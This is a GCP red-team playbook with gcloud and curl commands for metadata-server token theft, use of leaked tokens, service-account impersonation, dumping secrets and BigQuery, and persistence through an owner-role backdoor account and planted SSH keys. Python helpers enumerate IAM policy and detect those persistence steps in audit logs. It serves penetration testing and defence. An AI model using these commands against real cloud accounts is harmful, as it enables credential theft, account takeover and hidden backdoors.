GCP
This playbook outlines offensive security techniques in Google Cloud Platform (GCP). It is structured around the red teaming lifecycle: reconnaissance, exploitation, privilege escalation, lateral move
1. GCP Cloud Overview
Core Components
Google Cloud IAM – Identity and Access Management (users, service accounts, roles, policies).
Projects – Organizational units that contain resources.
Service Accounts – Identities for workloads (VMs, functions, apps).
Cloud Resource Hierarchy – Org → Folders → Projects → Resources.
Planes of Access
Control Plane – Google Cloud Console, Cloud SDK (gcloud), REST APIs.
Data Plane – Actual workloads (VMs, buckets, databases).
🔑 Security Insight:
Compromise of Control Plane creds (a user or service account holding roles/owner or roles/editor on the project) = full takeover of everything in scope, data plane included.
Compromise of Service Account = whatever roles that SA holds, usually within one project (but SAs can be granted roles in other projects or at folder/org level, and their privileges are often escalatable; see 4.3).
2. Authentication & Credential Types
2.1 User Accounts
Human users with Google identities (Google Workspace or Cloud Identity accounts, or consumer Gmail accounts added directly to IAM).
2.2 Service Accounts
Non-human principals for apps/VMs, named <name>@<project>.iam.gserviceaccount.com.
Auth via JSON key files (long-lived, downloadable, the classic leak), the Metadata Server on any workload the SA is attached to, or impersonation by another principal through the IAM Credentials API (short-lived, no key on disk).
2.3 Access Tokens
OAuth2 bearer tokens (opaque "ya29." strings, typically valid for one hour, limited to the OAuth scopes the workload was created with).
Commonly abused via SSRF → metadata server, or recovered from logs, CI output and environment variables.
Get token inside VM (the Metadata-Flavor header is mandatory; the server answers 403 without it, which is why an SSRF that cannot set request headers does not reach it):
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
3. Enumeration
3.1 Identity Enumeration
Check current active account:
gcloud auth list
Get project ID:
gcloud config get-value project
List IAM policy for a project:
gcloud projects get-iam-policy <project-id> --format=json
Find the roles bound directly to a specific service account (exact member match; jq's contains() would also match longer names with the same prefix). Note that this shows only bindings on the project itself: roles inherited from the folder or organization do not appear, and a binding with a condition applies only while the condition holds.
gcloud projects get-iam-policy <project-id> --format=json \
| jq -r '.bindings[] | select(any(.members[]; . == "serviceAccount:dev-sa@<project>.iam.gserviceaccount.com")) | .role'
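The jq one-liner answers one question about one member. The following is an added example, not code from the original page, that reads the same get-iam-policy JSON and answers the questions a tester actually has at this point: which roles a member holds, which bindings grant takeover-capable roles (and whether a condition gates them), what is exposed to allUsers/allAuthenticatedUsers, and which grants go through groups whose membership the project policy does not show. The policy document, project name and principals are constructed for the example; the default compute SA naming (<project-number>-compute@developer.gserviceaccount.com) is real.

```python
import json

# Constructed sample of `gcloud projects get-iam-policy <project-id> --format=json`
# output. Project, principals and the expired condition are invented.
SAMPLE_POLICY = json.loads("""
{
  "bindings": [
    {"role": "roles/owner", "members": ["user:alice@example.com"]},
    {"role": "roles/editor",
     "members": ["serviceAccount:123456789012-compute@developer.gserviceaccount.com",
                 "group:devs@example.com"]},
    {"role": "roles/iam.serviceAccountTokenCreator",
     "members": ["serviceAccount:dev-sa@example-project.iam.gserviceaccount.com"],
     "condition": {"title": "temporary",
                   "expression": "request.time < timestamp('2020-01-01T00:00:00Z')"}},
    {"role": "roles/viewer", "members": ["allAuthenticatedUsers"]},
    {"role": "roles/storage.objectViewer", "members": ["allUsers"]}
  ],
  "etag": "BwX1abcDEFG=",
  "version": 3
}
""")

# Roles whose holders can take over the project or mint credentials for other
# principals (basic roles plus the IAM roles used by the escalation paths in 4.3).
DANGEROUS_ROLES = {
    "roles/owner", "roles/editor",
    "roles/iam.securityAdmin", "roles/iam.serviceAccountAdmin",
    "roles/iam.serviceAccountKeyAdmin", "roles/iam.serviceAccountTokenCreator",
    "roles/iam.serviceAccountUser", "roles/resourcemanager.projectIamAdmin",
}

# Special members: a match means anyone on the internet / any Google account.
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}


def roles_for(policy, member):
    """[(role, condition-or-None)] for one member, exact match only."""
    return [(b["role"], b.get("condition"))
            for b in policy.get("bindings", [])
            if member in b.get("members", [])]


def dangerous_bindings(policy):
    """(unconditional, conditional) lists of (member, role) for DANGEROUS_ROLES.
    Conditional grants are kept separate rather than dropped: the condition may be
    attacker-satisfiable, or already expired as in the sample, and is easy to
    misread as 'not granted' when scanning the raw JSON."""
    unconditional, conditional = [], []
    for b in policy.get("bindings", []):
        if b["role"] not in DANGEROUS_ROLES:
            continue
        bucket = conditional if b.get("condition") else unconditional
        bucket.extend((m, b["role"]) for m in b.get("members", []))
    return unconditional, conditional


def public_bindings(policy):
    """(member, role) pairs exposed to allUsers / allAuthenticatedUsers."""
    return [(m, b["role"]) for b in policy.get("bindings", [])
            for m in b.get("members", []) if m in PUBLIC_MEMBERS]


def group_bindings(policy):
    """(member, role) pairs held via groups. Group membership is not visible in the
    project policy, so each one is a lead to chase in Workspace/Cloud Identity."""
    return [(m, b["role"]) for b in policy.get("bindings", [])
            for m in b.get("members", []) if m.startswith("group:")]


if __name__ == "__main__":
    sa = "serviceAccount:dev-sa@example-project.iam.gserviceaccount.com"
    print("roles for", sa, "->", roles_for(SAMPLE_POLICY, sa))
    unc, cond = dangerous_bindings(SAMPLE_POLICY)
    print("dangerous (unconditional):", unc)
    print("dangerous (conditional):", cond)
    print("public:", public_bindings(SAMPLE_POLICY))
    print("via groups:", group_bindings(SAMPLE_POLICY))
```

On a real engagement, feed it the output of gcloud projects get-iam-policy, and run the same functions over gcloud organizations get-iam-policy and the folder policies, since inherited bindings are where the interesting roles usually live.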
3.2 Service Account Enumeration
List all service accounts in a project:
gcloud iam service-accounts list --project <project-id>
Get details about a service account:
gcloud iam service-accounts describe <sa-name>@<project>.iam.gserviceaccount.com
List keys associated with a service account:
gcloud iam service-accounts keys list --iam-account <sa-name>@<project>.iam.gserviceaccount.com
3.3 Storage Enumeration
List storage buckets:
gcloud storage buckets list --project <project-id>
List objects in a bucket:
gcloud storage objects list gs://<bucket-name>
Download file from bucket:
gcloud storage cp gs://<bucket-name>/<object> ./localfile
4. Exploitation
4.1 Metadata Service Abuse (IMDS Equivalent)
Inside a VM, access the metadata endpoint. The same tree also serves .../service-accounts/default/email and .../default/scopes (read these first: the token is only usable for those scopes, however many IAM roles the SA holds) and instance/attributes and project/attributes, where startup scripts and custom metadata often carry secrets:
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
Use the token with gcloud. There is no "activate-access-token" subcommand: pass the raw token through the CLOUDSDK_AUTH_ACCESS_TOKEN environment variable (or the --access-token-file flag, see 4.2), which every gcloud command honours:
export ACCESS_TOKEN=$(curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google" | jq -r .access_token)
export CLOUDSDK_AUTH_ACCESS_TOKEN=$ACCESS_TOKEN
4.2 Using Leaked Tokens
If attacker has a token (e.g., from logs, SSRF), first ask Google's tokeninfo endpoint (https://oauth2.googleapis.com/tokeninfo?access_token=...) which identity and scopes it carries and whether it has already expired, then save it and hand it to gcloud with --access-token-file (again, there is no "activate-access-token" subcommand; the flag works on any command):
echo "<token>" > token.txt
Example (from CTF-like scenario):
gcloud projects get-iam-policy <project-id> --format=json --access-token-file token.txt
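Both 4.1 and 4.2 assume gcloud is available, which is rarely true from an SSRF or a minimal container. The block below is an added example, not code from the original page, showing the same steps against the raw HTTP endpoints: fetch the metadata token with the mandatory header, cache it until shortly before expires_in runs out, check a found token with tokeninfo, and call the Resource Manager getIamPolicy REST method with a Bearer header. The URLs, header and response field names are the real ones; FakeTransport and its replies are constructed stand-ins so the block runs offline, and the project names and SA email are invented.

```python
import json
import time
import urllib.error
import urllib.request

METADATA_TOKEN_URL = ("http://metadata.google.internal/computeMetadata/v1/"
                      "instance/service-accounts/default/token")
METADATA_HEADERS = {"Metadata-Flavor": "Google"}  # mandatory; the server 403s without it
TOKENINFO_URL = "https://oauth2.googleapis.com/tokeninfo?access_token="


def http_json(url, headers=None, data=None, timeout=3):
    """Real transport: GET (POST when data is given) and return (status, JSON body).
    Factored out so everything below can run offline against FakeTransport."""
    req = urllib.request.Request(url, data=data, headers=headers or {},
                                 method="POST" if data is not None else "GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, json.loads(resp.read().decode())
    except urllib.error.HTTPError as err:
        return err.code, json.loads(err.read().decode() or "{}")


class MetadataToken:
    """Access token of the VM's attached service account, cached until shortly
    before expiry. Tokens are opaque 'ya29.' strings, so the lifetime has to
    come from the expires_in field, not from decoding the token."""

    def __init__(self, transport=http_json, skew=60):
        self.transport = transport
        self.skew = skew
        self._token, self._expires_at = None, 0.0

    def get(self, now=None):
        now = time.time() if now is None else now
        if self._token and now < self._expires_at - self.skew:
            return self._token
        status, body = self.transport(METADATA_TOKEN_URL, METADATA_HEADERS)
        if status != 200 or "access_token" not in body:
            raise RuntimeError(f"metadata token fetch failed: {status} {body}")
        self._token = body["access_token"]
        self._expires_at = now + body["expires_in"]
        return self._token


def token_info(token, transport=http_json):
    """Identity (email), scopes and remaining lifetime of any access token,
    or None when Google rejects it (expired or revoked)."""
    status, body = transport(TOKENINFO_URL + token)
    return body if status == 200 else None


def get_iam_policy(project_id, token, transport=http_json):
    """REST equivalent of `gcloud projects get-iam-policy` with a raw bearer token.
    Returns None on 403: the token is valid but lacks
    resourcemanager.projects.getIamPolicy or the VM's OAuth scopes are too narrow."""
    url = f"https://cloudresourcemanager.googleapis.com/v1/projects/{project_id}:getIamPolicy"
    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    status, body = transport(url, headers, data=b"{}")
    if status == 403:
        return None
    if status != 200:
        raise RuntimeError(f"getIamPolicy failed: {status} {body}")
    return body


class FakeTransport:
    """Constructed offline stand-in for the metadata server and the two Google
    endpoints above, answering with the JSON shapes the real ones return."""

    def __init__(self, sa_email="dev-sa@example-project.iam.gserviceaccount.com"):
        self.sa_email = sa_email
        self.calls = []

    def __call__(self, url, headers=None, data=None, timeout=3):
        headers = headers or {}
        self.calls.append((url, headers, data))
        if url == METADATA_TOKEN_URL:
            if headers.get("Metadata-Flavor") != "Google":
                return 403, {"error": "Missing Metadata-Flavor:Google header"}
            return 200, {"access_token": "ya29.constructed", "expires_in": 3599,
                         "token_type": "Bearer"}
        if url.startswith(TOKENINFO_URL):
            if url.endswith("ya29.constructed"):
                return 200, {"email": self.sa_email, "expires_in": "3599",
                             "scope": "https://www.googleapis.com/auth/cloud-platform"}
            return 400, {"error": "invalid_token"}
        if url.endswith(":getIamPolicy") and data is not None:
            if headers.get("Authorization") != "Bearer ya29.constructed":
                return 401, {"error": {"code": 401, "status": "UNAUTHENTICATED"}}
            if "locked-project" in url:  # valid token, no permission
                return 403, {"error": {"code": 403, "status": "PERMISSION_DENIED"}}
            return 200, {"bindings": [{"role": "roles/viewer",
                                       "members": ["serviceAccount:" + self.sa_email]}],
                         "etag": "BwX1abcDEFG=", "version": 1}
        return 404, {}


if __name__ == "__main__":
    fake = FakeTransport()  # swap for http_json when running on a real VM
    tok = MetadataToken(transport=fake).get()
    print("token info:", token_info(tok, transport=fake))
    print("policy:", get_iam_policy("example-project", tok, transport=fake))
```

The 403-versus-401 distinction is the useful diagnostic: 401 means the token itself is dead, 403 means the token works and you should move on to resources the SA can actually read (buckets, secrets, other projects) instead of retrying IAM.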
4.3 Privilege Escalation via Service Accounts
Which escalation is possible depends on the exact permission the compromised principal holds on the target SA (verify with gcloud iam roles describe <role> rather than trusting the role name):
roles/iam.serviceAccountTokenCreator (iam.serviceAccounts.getAccessToken) – mint access tokens for the target SA directly; this is what --impersonate-service-account uses.
roles/iam.serviceAccountUser (iam.serviceAccounts.actAs) – cannot mint tokens, but lets you attach the SA to a workload you control (new VM, Cloud Function, Cloud Run service) and read its token from that workload's metadata server.
roles/editor – includes actAs and commonly iam.serviceAccountKeys.create, so a long-lived JSON key can be minted for any SA in the project, including one that holds roles/owner.
Impersonate a target SA when token-creator rights are present:
gcloud auth print-access-token --impersonate-service-account=<target-sa>@<project>.iam.gserviceaccount.com
5. Post-Exploitation
5.1 Secrets (Secret Manager, Cloud KMS)
If Secret Manager is accessible (secretmanager.versions.access on the secret), dump the payloads directly. Cloud KMS keys cannot be exported, but cloudkms.cryptoKeyVersions.useToDecrypt lets you decrypt anything encrypted under them, which is usually the same outcome:
gcloud secrets list --project <project-id>
gcloud secrets versions access latest --secret=<secret-name> --project <project-id>
5.2 BigQuery Data Dumping
BigQuery is driven by the bq CLI shipped with the SDK (there is no GA gcloud bigquery command group):
bq ls --project_id=<project-id>
bq ls <project-id>:<dataset>
bq show --schema --format=prettyjson <project-id>:<dataset>.<table>
bq head -n 20 <project-id>:<dataset>.<table>
6. Lateral Movement
A service account is a principal like any other: if it has been granted roles in other projects or at folder/org level, the same token works there. Start with gcloud projects list and gcloud organizations list to see what the compromised identity can even enumerate, then read the policy at the top.
Enumerate organization-level roles (requires resourcemanager.organizations.getIamPolicy):
gcloud organizations get-iam-policy <org-id> --format=json
Roles like roles/resourcemanager.folderViewer and roles/browser are discovery aids (they reveal folders and projects you cannot yet access); roles/resourcemanager.projectMover is stronger, since moving a project under a folder where you already hold inherited roles changes the project's effective IAM.
7. Persistence
Create new service account and assign roles (each step lands in Cloud Audit Logs as CreateServiceAccount and SetIamPolicy, which is exactly what section 8 keys on; granting roles/owner to a freshly created SA is about as loud as it gets):
gcloud iam service-accounts create attacker-sa --display-name "Backdoor"
gcloud projects add-iam-policy-binding <project-id> \
--member="serviceAccount:attacker-sa@<project-id>.iam.gserviceaccount.com" \
--role="roles/owner"
Add SSH key to compromised VM instance. Two caveats: add-metadata replaces the existing ssh-keys value, so append to the current value rather than overwrite it or you lock out (and alert) the legitimate users; and instances with OS Login enabled ignore metadata ssh-keys entirely:
gcloud compute instances add-metadata <vm-name> \
--metadata ssh-keys="attacker:<public-key>"
8. Detection & Mitigation
Monitor IAM policy changes (Admin Activity audit logs are on by default: alert on SetIamPolicy grants of roles/owner, roles/editor or the iam.* admin roles, on CreateServiceAccount and CreateServiceAccountKey, and on compute.instances.setMetadata touching ssh-keys).
Restrict service account privileges (least privilege; do not leave the default compute SA with roles/editor, and enforce the iam.automaticIamGrantsForDefaultServiceAccounts org policy so new projects do not get it either).
Restrict metadata-server exposure: the server is link-local and cannot be firewalled, so the real controls are fixing SSRF, keeping VM OAuth scopes narrow and attaching a dedicated minimal SA to each workload instead of the default one.
Prefer short-lived tokens and impersonation over JSON keys; block key creation with the iam.disableServiceAccountKeyCreation org policy and rotate any keys that must exist.
Enable VPC Service Controls to limit exfiltration across perimeters, and OS Login so SSH access is tied to IAM rather than to instance metadata.
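To make the first bullet concrete, here is an added example, not part of the original page, that runs a small detection over constructed Cloud Audit Log entries mirroring the section 7 persistence commands. The field layout (protoPayload.methodName, authenticationInfo.principalEmail, serviceData.policyDelta.bindingDeltas) and method names follow the real AuditLog schema; the principals, project, instance and timestamps are invented, and the setMetadata request body is simplified to its items list. Beyond per-event rules, it correlates on the acting principal so the create-SA, grant-owner, create-key sequence surfaces as one chain rather than three unrelated alerts.

```python
import json
from datetime import datetime

# Constructed Admin Activity audit log entries, one JSON object per line, trimmed
# to the fields a detection reads. The first four mirror the section 7 backdoor
# sequence; the last is a benign grant for contrast.
SAMPLE_LOGS = [json.loads(line) for line in r'''
{"timestamp":"2024-05-01T10:00:00Z","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","serviceName":"iam.googleapis.com","methodName":"google.iam.admin.v1.CreateServiceAccount","authenticationInfo":{"principalEmail":"123456789012-compute@developer.gserviceaccount.com"},"resourceName":"projects/example-project/serviceAccounts/attacker-sa@example-project.iam.gserviceaccount.com"}}
{"timestamp":"2024-05-01T10:00:05Z","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","serviceName":"cloudresourcemanager.googleapis.com","methodName":"SetIamPolicy","authenticationInfo":{"principalEmail":"123456789012-compute@developer.gserviceaccount.com"},"resourceName":"projects/example-project","serviceData":{"policyDelta":{"bindingDeltas":[{"action":"ADD","role":"roles/owner","member":"serviceAccount:attacker-sa@example-project.iam.gserviceaccount.com"}]}}}}
{"timestamp":"2024-05-01T10:01:00Z","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","serviceName":"iam.googleapis.com","methodName":"google.iam.admin.v1.CreateServiceAccountKey","authenticationInfo":{"principalEmail":"123456789012-compute@developer.gserviceaccount.com"},"resourceName":"projects/example-project/serviceAccounts/attacker-sa@example-project.iam.gserviceaccount.com"}}
{"timestamp":"2024-05-01T10:02:00Z","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","serviceName":"compute.googleapis.com","methodName":"v1.compute.instances.setMetadata","authenticationInfo":{"principalEmail":"123456789012-compute@developer.gserviceaccount.com"},"resourceName":"projects/example-project/zones/us-central1-a/instances/web-1","request":{"items":[{"key":"ssh-keys","value":"attacker:ssh-ed25519 AAAAC3 attacker"}]}}}
{"timestamp":"2024-05-01T11:00:00Z","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","serviceName":"cloudresourcemanager.googleapis.com","methodName":"SetIamPolicy","authenticationInfo":{"principalEmail":"alice@example.com"},"resourceName":"projects/example-project","serviceData":{"policyDelta":{"bindingDeltas":[{"action":"ADD","role":"roles/viewer","member":"user:bob@example.com"}]}}}}
'''.strip().splitlines()]

# Grants of these roles are worth an alert on their own.
HIGH_RISK_ROLES = {
    "roles/owner", "roles/editor", "roles/iam.securityAdmin",
    "roles/iam.serviceAccountTokenCreator", "roles/iam.serviceAccountKeyAdmin",
    "roles/resourcemanager.projectIamAdmin",
}


def _principal(entry):
    return entry["protoPayload"].get("authenticationInfo", {}).get("principalEmail", "?")


def _ts(entry):
    # Python < 3.11 fromisoformat() does not accept the trailing 'Z'
    return datetime.fromisoformat(entry["timestamp"].replace("Z", "+00:00")).timestamp()


def classify(entry):
    """(severity, reason) for one entry, or None when it is not interesting."""
    p = entry.get("protoPayload", {})
    method = p.get("methodName", "")
    who, target = _principal(entry), p.get("resourceName", "?")
    if method == "SetIamPolicy":
        deltas = p.get("serviceData", {}).get("policyDelta", {}).get("bindingDeltas", [])
        grants = [d for d in deltas
                  if d.get("action") == "ADD" and d.get("role") in HIGH_RISK_ROLES]
        if not grants:
            return None
        return "HIGH", f"{who} granted " + ", ".join(
            f"{d['role']} to {d['member']}" for d in grants) + f" on {target}"
    if method.endswith("CreateServiceAccountKey"):
        # user-managed keys are the long-lived credential persistence relies on
        return "HIGH", f"{who} created a user-managed key for {target}"
    if method.endswith("CreateServiceAccount"):
        return "MEDIUM", f"{who} created service account {target}"
    if method.endswith("compute.instances.setMetadata"):
        keys = [i.get("key") for i in p.get("request", {}).get("items", [])]
        sev = "HIGH" if "ssh-keys" in keys else "LOW"
        return sev, f"{who} set metadata {keys or '(body not logged)'} on {target}"
    return None


def alerts(entries):
    """Per-event alerts in time order: [(timestamp, principal, method, severity, reason)]."""
    out = []
    for e in entries:
        c = classify(e)
        if c:
            out.append((_ts(e), _principal(e), e["protoPayload"]["methodName"], c[0], c[1]))
    return sorted(out)


def persistence_chains(entries, window_seconds=600):
    """Principals that both created an SA or key and granted a high-risk role
    within the window, mapped to their method sequence."""
    by_principal = {}
    for ts, who, method, _, _ in alerts(entries):
        by_principal.setdefault(who, []).append((ts, method))
    chains = {}
    for who, evs in by_principal.items():
        creates = [t for t, m in evs
                   if m.endswith(("CreateServiceAccount", "CreateServiceAccountKey"))]
        grants = [t for t, m in evs if m == "SetIamPolicy"]
        if any(abs(c - g) <= window_seconds for c in creates for g in grants):
            chains[who] = [m for _, m in evs]
    return chains


if __name__ == "__main__":
    for ts, who, method, sev, reason in alerts(SAMPLE_LOGS):
        print(f"{sev:6} {method:45} {reason}")
    print("chains:", persistence_chains(SAMPLE_LOGS))
```

In production the same logic sits in a Cloud Logging sink feeding a SIEM; the point of the principal correlation is that the compute default SA creating IAM principals and granting roles/owner is never legitimate activity, whereas each event alone might be.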